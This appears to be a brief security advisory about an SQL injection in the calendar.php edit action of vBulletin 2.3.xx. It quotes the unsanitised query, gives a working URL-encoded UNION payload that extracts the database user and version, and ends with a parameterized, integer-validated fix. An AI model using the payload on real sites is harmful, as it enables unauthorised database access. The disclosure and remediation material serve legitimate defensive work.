vBulletin Forum 2.3.xx SQL Injection

There exists an SQL injection problem in calendar.php.

-------- Cut from line 585 in calendar.php ----------
else if ($action == "edit")
{
    // $eventid is interpolated directly into the SQL string, unquoted
    $eventinfo = $DB_site->query_first("SELECT allowsmilies,public,userid,eventdate,event,subject FROM calendar_events WHERE eventid = $eventid");
-----------------------------------------------------

If the MySQL version is greater than 4.00, a UNION attack could be used.

-----------------------------------------
%20union%20(SELECT%20allowsmilies,public,userid,'0000-0-0',user(),version()%20FROM%20calendar_events%20WHERE%20eventid%20=%2013)%20order%20by%20eventdate
-----------------------------------------

The query_first function will only return the first row of the query result, so make sure it returns the one you want.
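A hardened form of the lookup above, as an added example that is not vBulletin's code or its actual patch. It assumes PDO with the SQLite driver so it runs offline; parse_event_id and fetch_event are hypothetical names, and the table and its one row are constructed sample data that mirror the columns in the advisory's query.

```php
<?php
// Added example (not vBulletin code): validate eventid as an integer and
// bind it as a parameter instead of interpolating it into the SQL string.

// Hypothetical helper: accept only a positive decimal integer.
function parse_event_id($raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Hypothetical helper: the same SELECT as the advisory, parameterized.
function fetch_event(PDO $db, $rawEventId): ?array
{
    $eventid = parse_event_id($rawEventId);
    if ($eventid === null) {
        return null; // non-numeric input never reaches the database
    }
    // Bound parameter: the value is sent as data, not as part of the SQL text.
    $stmt = $db->prepare(
        'SELECT allowsmilies, public, userid, eventdate, event, subject
           FROM calendar_events WHERE eventid = :eventid'
    );
    $stmt->bindValue(':eventid', $eventid, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed sample table and row for the demonstration.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE calendar_events (eventid INTEGER PRIMARY KEY,
           allowsmilies INT, public INT, userid INT,
           eventdate TEXT, event TEXT, subject TEXT)');
$db->exec("INSERT INTO calendar_events
           VALUES (13, 1, 1, 7, '2004-01-01', 'Meeting', 'Staff')");

// A well-formed id is looked up normally.
var_dump(fetch_event($db, '13'));
// Input carrying anything beyond digits is stopped by parse_event_id.
var_dump(fetch_event($db, '13 union (select 1)'));
```

In code of that era built on the old mysql extension, casting with intval($eventid) before building the query gives the same integer-only guarantee.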
